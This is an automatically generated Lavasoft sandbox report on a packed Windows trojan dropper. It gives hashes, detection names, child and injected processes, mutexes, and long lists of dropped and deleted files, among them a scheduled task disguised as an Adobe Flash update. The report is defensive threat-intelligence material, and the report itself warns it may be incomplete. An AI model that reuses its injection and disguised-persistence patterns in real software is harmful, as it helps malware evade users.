Trojan.GenericKD.2513912 (B) (Emsisoft), Trojan.GenericKD.2513912 (AdAware), Trojan-Banker.Win32.Banker.FD, Trojan.NSIS.StartPage.FD, Trojan.Win32.Alureon.FD, Trojan.Win32.Delphi.FD, Trojan.Win32.Iconomon.FD, Trojan.Win32.IEDummy.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Banker, Trojan, VirTool
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: ac795a38049d35af11e6f9c0ac670932
SHA1: 99545e2b3830fa38afcadbdbb50c653d2aa2fb3f
SHA256: 2c3dd90557641235c365396d44c016d0a3944c7a778539fc32901e9b7a42e88c
SSDeep: 12288:Kvi4f4UBFr/pGmjNXwSXTO/NW SoAKH0ptJGwJm25dJvNa42poBFUo8:Ka41/YsNXwSXTkW EKH0vLg21ioBFUo
Size: 611840 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: NsPack14, PolyEnE001byLennartHedlund, NsPack14byNorthStarLiuXingPing, NsPackV14, UPolyXv05_v6
Company: no certificate found
Created at: 2015-06-25 16:12:30
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
-2100_1_ss.exe:1976
ksktiklit_505_s.exe:1556
Y73P2PSearcher_4.exe:2152
deployPkg.exe:2456
NewEyeNurse.exe:3868
eyeXzUvGuard_368.exe:3584
tusb_186_1.exe:584
setup_30015.exe:1220
JSZS.exe:3036
JSZS.exe:1480
The Trojan injects its code into the following process(es):
069.exe:2820
copy%original file name%.exe:896
deployPkg.exe:2488
%original file name%.exe:196
Y73Server.exe:2208
JSZS.exe:1560
Mutexes
The following mutexes were created/opened:
__DDrawCheckExclMode____DDrawExclMode__DDrawWindowListMutexDDrawDriverObjectListMutex{1B655094-FE2A-433c-A877-FF9793445069}c:!documents and settings!adm!local settings!history!history.ie5!mshist012015072520150726!_!SHMSFTHISTORY!_CTF.LBES.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003CTF.Compart.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003CTF.TMD.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003CTF.Layouts.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003CTF.Asm.MutexDefaultS-1-5-21-1844237615-1960408961-1801674531-1003RasPbFileWininetProxyRegistryMutexWininetConnectionMutexWininetStartupMutexc:!documents and settings!adm!local settings!history!history.ie5!c:!documents and settings!adm!cookies!c:!documents and settings!adm!local settings!temporary internet files!content.ie5!_!MSFTHISTORY!_ZonesLockedCacheCounterMutexZonesCacheCounterMutexZonesCounterMutexShimCacheMutex
File activity
The process 069.exe:2820 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\mgbg_btn_clos.BMP (13 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\nsDialogs.dll (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\inetc.dll (27 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\set.bmp (27 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\gpmc1.msi (766238 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\Thumbs.db (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\SkinProgress.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\unchecked.bmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\ns17.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\gpmc1.zip (44832 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\SkinBtn.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\KillProcDLL.dll (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\505.png (2712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\503.png (8368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\nsisSlideshow.dll (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\ProcessWork.dll (7190 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@update.zchon[1].txt (202 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\bg.bmp (12280 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\ProgressBar.bmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\nsRandom.dll (409 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\checked.bmp (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\WndProc.dll (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\bg2.bmp (12280 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\tensile.bmp (14600 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\nsUnzip.dll (3335 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\btn_btn.bmp (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\btn_mini.bmp (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\gpmc1.cab (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\502.png (4974 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\501.png (1207 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\setuphtparameter.txt (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\update[1].zip (44832 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\504.png (3624 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\unRadioButton.bmp (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\unset.bmp (27 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\btn_clos.BMP (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\progress.bmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\license.rtf (1568 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\RadioButton.bmp (2 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (1060 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\btn_in.bmp (2784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\mgbg.bmp (2784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\Slides.dat (510 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp\nsWindows.dll (10 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nst14.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd13.tmp (0 bytes)
The process copy%original file name%.exe:896 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Cookies\Current_User@tj.sui17[1].txt (206 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\stat[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\core[1].php (763 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz[1].txt (163 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz.mmstat[1].txt (203 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@mmstat[1].txt (168 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\will[1].htm (374 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (4144 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\z_stat[1].php (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014040820140409\index.dat (0 bytes)
%Documents and Settings%\%current user%\Desktop\Internet Explorer.lnk (0 bytes)
%Documents and Settings%\%current user%\Desktop\¶à²Ê±ãÇ©.lnk (0 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014040820140409 (0 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\ÃÂÂÒÃÂÑÛ¾¦\ÃÂÂÒÃÂÑÛ¾¦.lnk (0 bytes)
%Documents and Settings%\%current user%\Desktop\ÖÖ×ÓËÑË÷ÉñÆ÷.lnk (0 bytes)
%Program Files%\JiSuZhuShou\¼«ËÙÖúÊÖ.lnk (0 bytes)
The process -2100_1_ss.exe:1976 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\JiSuZhuShou\JSZS.exe (55161 bytes)
%Program Files%\JiSuZhuShou\¼«ËÙÖúÊÖ.lnk (613 bytes)
%Program Files%\JiSuZhuShou\x64\usbrasr.sys (15305 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\¼«ËÙÖúÊÖ\¼«ËÙÖúÊÖ.lnk (691 bytes)
%Program Files%\JiSuZhuShou\AdbWinApi.dll (3748 bytes)
%Program Files%\JiSuZhuShou\adb.exe (24009 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy11.tmp\JSZS.exe (55161 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy11.tmp\System.dll (11 bytes)
%Program Files%\JiSuZhuShou\JSHlp.exe (24568 bytes)
%Program Files%\JiSuZhuShou\usbrasr.sys (11393 bytes)
%Program Files%\JiSuZhuShou\AdbWinUsbApi.dll (2733 bytes)
%Program Files%\JiSuZhuShou\uninst.exe (892 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\¼«ËÙÖúÊÖ\öÃâ€ÃƒËœÃ‚¼Â«Ã‹Ã™Ã–úÊÖ.lnk (703 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsy11.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy11.tmp\JSZS.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd10.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy11.tmp (0 bytes)
The process ksktiklit_505_s.exe:1556 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Desktop\Internet Explorer.lnk (1 bytes)
%Documents and Settings%\All Users\Application Data\201572519\ImagePlugin.dll (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~xc16.tmp.0\libviewe.dll (7972 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~xc16.tmp.0\unins000.exe (122 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~xc16.tmp.0\ImagePlugin.dll (50 bytes)
%Documents and Settings%\All Users\Application Data\201572519\msvcr120.dll (7345 bytes)
%Documents and Settings%\All Users\Application Data\201572519\deployPkg.exe (673 bytes)
%WinDir%\Tasks\Adobe Flash fastsee Files Update Ver 2015725.job (568 bytes)
%Documents and Settings%\All Users\Application Data\201572519\ui.dll (4545 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\快快看图(725)\ÃÂÞ¸´ÅäÖÃ\ÃÂÞ¸´ÅäÖÃ.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~xc16.tmp.0\ui.dll (3744 bytes)
%Documents and Settings%\All Users\Application Data\201572519\libviewe.dll (10177 bytes)
%Documents and Settings%\All Users\Application Data\201572519\msvcp120.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~xc16.tmp.0\res.zip (144 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\快快看图(725)\快快看图.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~xc16.tmp.0\msvcp120.dll (1727 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~xc16.tmp.0\msvcr120.dll (6403 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~xc16.tmp.0\fastsee.exe (166 bytes)
%Documents and Settings%\All Users\Application Data\201572519\res.zip (673 bytes)
%Documents and Settings%\All Users\Application Data\201572519\unins000.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\~kb15.tmp (9606 bytes)
%Documents and Settings%\All Users\Application Data\fastsee_Data\filecache.ini (574 bytes)
The process Y73P2PSearcher_4.exe:2152 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\Y73ÖÖ×ÓËÑË÷ÉñÆ÷\setting.ini (32 bytes)
%Program Files%\Y73ÖÖ×ÓËÑË÷ÉñÆ÷\Y73Server.exe (9130 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Y73ÖÖ×ÓËÑË÷ÉñÆ÷\Y73ÖÖ×ÓËÑË÷ÉñÆ÷.lnk (744 bytes)
%Program Files%\Y73ÖÖ×ÓËÑË÷ÉñÆ÷\uninst.exe (745 bytes)
%Documents and Settings%\%current user%\Desktop\ÖÖ×ÓËÑË÷ÉñÆ÷.lnk (732 bytes)
%Program Files%\Y73ÖÖ×ÓËÑË÷ÉñÆ÷\Y73ÖÖ×ÓËÑË÷ÉñÆ÷.url (37 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Y73ÖÖ×ÓËÑË÷ÉñÆ÷\¹Ù·½Ö÷Ò³.url (37 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\Y73ÖÖ×ÓËÑË÷ÉñÆ÷\Uninstall.lnk (727 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsr12.tmp (0 bytes)
The process deployPkg.exe:2456 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\d3d9caps.tmp (1324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\tj3[1].htm (11 bytes)
%Documents and Settings%\All Users\Application Data\fastsee_Data\filecache.ini (64 bytes)
The Trojan deletes the following file(s):
%System%\d3d9caps.dat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\tj3[1].htm (0 bytes)
The process eyeXzUvGuard_368.exe:3584 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsf19.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\bt_hui_07.png (8 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\winlgView.exe (4380 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\text_14.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\NewEyeNurse.exe (7931 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\ÃÂÂÒÃÂÑÛ¾¦\ÃÂÂÒÃÂÑÛ¾¦.lnk (1 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\close.jpg (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\j_4.png (2443 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\bt_hui_05.png (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\bt_hui_05.png (9 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\xx_bg.png (4 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\zjm_12.png (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\gou.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\yb.jpg (1886 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\black.png (934 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\bt_lv_03.png (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\shezhi.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\j_2.png (3165 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\black.png (934 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\min.jpg (1 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\update\updateOver.html (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\min.png (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf19.tmp\Md5dll.dll (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\jiancha.png (15 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\mstRelax.exe (6501 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\text_15.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\j_1.png (3487 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\skins.cfg (71 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\newEyeFun.dll (5250 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\zan.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\sure.png (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\xx_bg.png (4 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\nEyeNurse.dll (15437 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\cancel.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\AndroidAssistHelper.dll (12237 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\Q-SDK.exe (51217 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\jiancha.png (15 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\zan.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\300x250.jpg (14 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\sure.png (16 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\bt_lv_05.png (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\text_13.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\bt_hui_03.png (8 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\bg.png (1962 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\black_10.png (934 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\bt_lv_07.png (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\j_5.png (3052 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\ts_bg.png (11 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\bt_hui_07.png (8 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\shezhi.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\black_10.png (934 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\bt_hui_03.png (8 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\min.png (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\bt_lv_09.png (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\close_j.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\close.jpg (2 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\ts_bg.png (11 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\newEyePro.dll (6466 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\j_2.png (3165 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\xiuxi.png (17 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\update\loading.gif (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\text_14.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\j_1.png (3487 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\bt_lv_05.png (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\banben.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\newEyePro.dll (6466 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\gou.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\unins000.exe (500 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\skins.edb (389 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\close.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\300x250.jpg (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\text_15.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf19.tmp\KillProcDLL.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\nEyeNurse.dll (15437 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\min.jpg (1 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\j_3.png (3202 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\bg.png (1962 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\text_12.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\NEUpgrade.exe (4566 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\bt_lv_09.png (26 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\text_12.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\banben.png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\close.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\j_4.png (2443 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\j_5.png (3052 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\skins.cfg (71 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\j_3.png (3202 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\winlgView.exe (4380 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\newEyeFun.dll (5250 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\update\updaterec.edb (1 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\update\update.html (2 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\close_j.png (1 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\update\upd.edb (10182 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf19.tmp\FindProcDLL.dll (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\mstRelax.exe (6501 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\bt_lv_03.png (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\zjm_12.png (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\bt_lv_07.png (24 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\Q-SDK.exe (51217 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\text_13.png (2 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\AndroidAssistHelper.dll (12237 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\yb.jpg (1886 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\cancel.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\NewEyeNurse\1.3.0.1315\skins\xiuxi.png (17 bytes)
%Documents and Settings%\%current user%\Application Data\NewEyeNurse\1.3.0.1315\skins\skins.edb (389 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsf19.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsk18.tmp (0 bytes)
The process tusb_186_1.exe:584 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsl1B.tmp\System.dll (11 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsl1B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsl1A.tmp (0 bytes)
The process %original file name%.exe:196 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\core[2].php (764 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\7191_653[1].htm (661 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\stat[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\5[1].js (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\shunfeiCL[1].js (387 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\vc.min[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\login[1].htm (16 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@www.91debug[1].txt (210 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\gdd9fid[1].swf (4428 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\reg[1].swf (2638 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\ren2[1].swf (28226 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\btn[1].gif (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\bg[1].swf (9621 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ren1[1].swf (8159 bytes)
